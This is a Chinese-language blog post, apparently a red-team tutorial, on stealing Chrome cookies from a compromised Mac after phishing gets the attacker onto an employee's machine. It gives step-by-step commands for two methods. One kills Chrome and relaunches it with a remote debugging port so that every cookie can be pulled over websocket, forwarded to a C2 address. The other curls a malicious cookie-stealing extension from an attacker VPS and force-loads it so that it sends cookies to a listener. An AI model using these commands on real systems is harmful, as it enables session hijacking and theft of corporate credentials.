写点什么

mac 浏览器密码获取难?教你两种方法,轻松搞定

  • 2022 年 4 月 15 日
  • 本文字数:2234 字

    阅读完需:约 7 分钟

前言

Windows 系统密码和 cookie 获取比较容易,用工具即可,但 Mac 下浏览器密码获取较难。

背景

当我们通过钓鱼等方式拿到单位员工的个人 PC 机时,通常需要对主机进行信息收集。而浏览器是一个重要的信息收集点。我们可以收集历史记录、书签寻找靶机。窃取密码登录 SSO、内部 OA 等等关键系统。但是在 MAC 下,因为系统的安全性,想要获取密码存在比较大的困难。


在 macOS 上,Google Chrome 的加密密钥存储在 Keychain 中,需要使用用户的明文密码解锁。


在 Windows 上,Google Chrome 版本 80+ 使用使用 DPAPI 加密的 AES-256 密钥加密 cookie。解密时不需密码。


windows 下密码和 cookie 获取比较容易,一般上工具(HackBrowserData)就行,这里不多说。mac 下的浏览器密码不好获取。mac 下因为系统安全性受限,使用相关工具会弹输入用户密码的框。看下面的弹窗提示,一下就暴露了,一般人也不会点允许。



因此我们得曲线救国,比如说获取 cookie。这里提供两种方法:

思路一:无头浏览器远程调试

为了便于调试和自动化,chrome 内核的浏览器支持远程调试,然后可以直接调用调试接口获取 cookie。网上的资料几乎大都是使用--headless 无头模式利用,但本人在 mac pro、最新版 chrome 浏览器却无法复现。


使用 headless 无头浏览器模式会爆如下的错误:



在一个老外的文章里找到了原因:



然后 curl 接口,不并无相关数据显示


第一步

  1. ps aux|grep Chrome 观察浏览器是否在运行。

  2. 若浏览器在运行,执行:killall "Google Chrome" 杀掉浏览器进程

  3. 马上在第二步命令后加上--restore-last-session,还原浏览器最近浏览的选项卡。

  4. 若浏览器未在运行,直接执行第二步,获取到 cookie 后 杀掉进程即可

第二步

启动 chrome 内核浏览器,开启指定调试端口


/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/用户名/Library/Application Support/Google/Chrome"


第三步

查看调试端口


curl -s localhost:9222/json


第四步

使用相关 websocket 工具(这里为了方便演示,直接使用了插件 Simple WebSocket Client****,入侵时候把调试端口用代理转发到本地,localhost 改成 c2 ip 就好。若不想代理,命令行下 websocket 的相关工具还有 wsc、python 模块等),


从第三步获取的结果中,任选一个 webSocketDebuggerUrl,发送{"id": 1, "method": "Network.getAllCookies"}


成功获取所有 cookie



【一>所有资源获取<一】1、很多已经买不到的绝版电子书 2、安全大厂内部的培训资料 3、全套工具包 4、100 份 src 源码技术文档 5、网络安全基础入门、Linux、web 安全、攻防方面的视频 6、应急响应笔记 7、 网络安全学习路线 8、ctf 夺旗赛解析 9、WEB 安全入门笔记

思路二:命令行加载恶意拓展

第二个思路来源是网上看到新闻,存在 chrome 恶意插件盗取用户的 cookie,因此查找相关资料进行学习。


令人惊喜的是,有位师傅 github 有直接写好获取 cookie 的插件


https://github.com/saucer-man/chrome_get_cookie


因此这里我们直接调用上面的插件脚本进行利用

第一步

vps 起一个 flask 服务器监听,接受 cookies 数据



第二步

使用 curl 或者 wget 下载恶意 chrome 插件文件夹到肉鸡电脑,


curl http://X.X.X.X/cookie.zip -o /tmp/cookie.zip unzip cookie.zip

第三步

用户未打开浏览器的情况,或我们直接杀掉浏览器进程:


killall "Google Chrome"


然后执行命令,使 chromer 浏览器加载我们的拓展


/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --load-extension=/tmp/cookie --user-data-dir="/Users/用户名/Library/Application Support/Google/Chrome" --restore-last-session


加载后会打开 chromer 浏览器



vps 服务器也同步接收到了数据,保存 cookie.json 文件在当前目录




用户已打开浏览器的时候,因为两个正在运行的 Chrome 实例不能共享同一个用户数据目录,因此用上面方法就行不通了。


网上有方法是把用户数据复制到另一个目录,但复现未成功,打开的是没用户数据的 chrome 浏览器。


首先使用 cp 命令复制文件夹到 tmp 目录


cp -R ~/Library/Application\ Support/Google/Chrome/Default ~/tmp


使用--user-data 命令,指定用户数据执行命令


/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --user-data-dir=~/tmp --load-extension=/Users/用户名/Desktop/tools/redteam/chrome_get_cookie


弹出来的是空白浏览器:



接收不到 cookie


参考链接:

[tps://saucer-man.com/information_security/787.html](https://saucer-man.com/information_security/787.html)
[https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e)
[https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/](https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/)(firefox)
复制代码

注意

killall "Google Chrome" 关闭 chrome 浏览器进程的命令


浏览器命令行相关参数:



chrome 用户数据配置文件夹保存路径:


Mac OS X: ~/Library/Application Support/Google/Chrome/Default
Windows XP: Documents and SettingsusernameLocal SettingsApplication DataGoogleChromeUser DataDefault
Windows 7: C:\Users\xxx\AppData\Local\Google\Chrome\User Data\Default
Linux: ~/.config/google-chrome/Default
Ubuntu: ~/.config/google-chrome 或 ~/.config/chromium
复制代码


用户头像

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
mac浏览器密码获取难?教你两种方法,轻松搞定_网络安全_网络安全学海_InfoQ写作平台